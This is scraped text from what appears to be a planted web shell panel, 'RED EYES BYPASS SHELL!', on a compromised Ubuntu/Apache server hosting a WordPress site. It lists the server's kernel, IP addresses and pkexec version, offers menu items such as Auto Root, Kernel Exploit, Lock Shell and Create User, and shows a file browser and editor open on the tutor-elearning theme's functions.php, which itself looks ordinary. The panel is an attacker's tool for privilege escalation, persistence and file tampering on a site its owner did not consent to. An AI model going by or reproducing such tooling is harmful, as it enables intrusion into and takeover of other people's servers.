Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
tutor-elearning /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
get-started
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
README.txt
3.91
KB
-rwxr-xr-x
functions.php
2.11
KB
-rwxr-xr-x
screenshot.png
212.2
KB
-rwxr-xr-x
style.css
40.49
KB
-rwxr-xr-x
theme.json
11.14
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Tutor Elearning functions and definitions * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package tutor-elearning * @since tutor-elearning 1.0 */ if ( ! function_exists( 'tutor_elearning_support' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * @since tutor-elearning 1.0 * * @return void */ function tutor_elearning_support() { // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); // Add support for block styles. add_theme_support( 'wp-block-styles' ); add_theme_support( 'align-wide' ); // Enqueue editor styles. add_editor_style( 'style.css' ); add_theme_support( 'responsive-embeds' ); // Add support for experimental link color control. add_theme_support( 'experimental-link-color' ); } endif; add_action( 'after_setup_theme', 'tutor_elearning_support' ); if ( ! function_exists( 'tutor_elearning_styles' ) ) : /** * Enqueue styles. * * @since tutor-elearning 1.0 * * @return void */ function tutor_elearning_styles() { // Register theme stylesheet. wp_register_style( 'tutor-elearning-style', get_template_directory_uri() . '/style.css', array(), wp_get_theme()->get( 'Version' ) ); // Enqueue theme stylesheet. wp_enqueue_style( 'tutor-elearning-style' ); wp_enqueue_style( 'dashicons' ); } endif; /* Enqueue Custom Js */ function tutor_elearning_scripts() { wp_enqueue_script( 'tutor-elearning-custom', esc_url(get_template_directory_uri()) . '/assets/js/custom.js', array('jquery') ); } add_action( 'wp_enqueue_scripts', 'tutor_elearning_scripts' ); add_action( 'wp_enqueue_scripts', 'tutor_elearning_styles' ); // Add block patterns require get_template_directory() . '/inc/block-pattern.php'; // Add block Style require get_template_directory() . '/inc/block-style.php'; // Add Customizer require get_template_directory() . '/inc/customizer.php'; // Get Started require get_template_directory() . '/get-started/getstart.php'; // Notice require get_template_directory() . '/get-started/notice.php';
Close